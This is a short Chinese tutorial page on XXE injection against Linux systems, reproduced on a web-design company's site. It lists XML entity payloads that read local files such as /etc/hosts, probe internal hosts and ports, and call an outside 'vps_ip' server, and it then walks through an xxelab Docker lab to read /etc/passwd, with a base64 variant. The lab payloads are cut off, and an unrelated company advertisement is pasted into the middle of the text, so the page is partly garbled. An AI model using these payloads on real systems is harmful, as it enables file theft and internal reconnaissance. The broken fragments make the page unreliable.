利用xxe获取linux系统的passwd
引用外部DTD文件访问内网主机/端口。
创新互联建站服务项目包括云岩网站建设、云岩网站制作、云岩网页制作以及云岩网络营销策划等。多年来,我们专注于互联网行业,利用自身积累的技术优势、行业经验、深度合作伙伴关系等,向广大中小型企业、政府机构等提供互联网行业的解决方案,云岩网站推广取得了明显的社会效益与经济效益。目前,我们服务的客户以成都为中心已经辐射到云岩省份的部分城市,未来相信会继续扩大服务区域并继续获得客户的支持与信任!
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看响应时间)
引用外部DTD文件访问wai网。
<!DOCTYPE a SYSTEM "http://vps_ip" >
引用内部实体。
<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>
外部实体读本地文件。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>
外部实体访问内wang主机端口。
<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看响应时间)
外部实体访问wai网。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>
docker中下载rrodrigo/xxelab该镜像
启动:docker run -d -p 8082:80 rrodrigo/xxelab
抓取注册包,发现采用xml格式传递,且邮箱有返回:
将返回内容处进行xxe回显设置读取/etc/passwd
]>
利用base64编码进行xxe,防止有返回包验证
]>
返回base64数据包,base64解码
分享题目:利用xxe获取linux系统的passwd
当前路径:http://cdiso.cn/article/iiojpp.html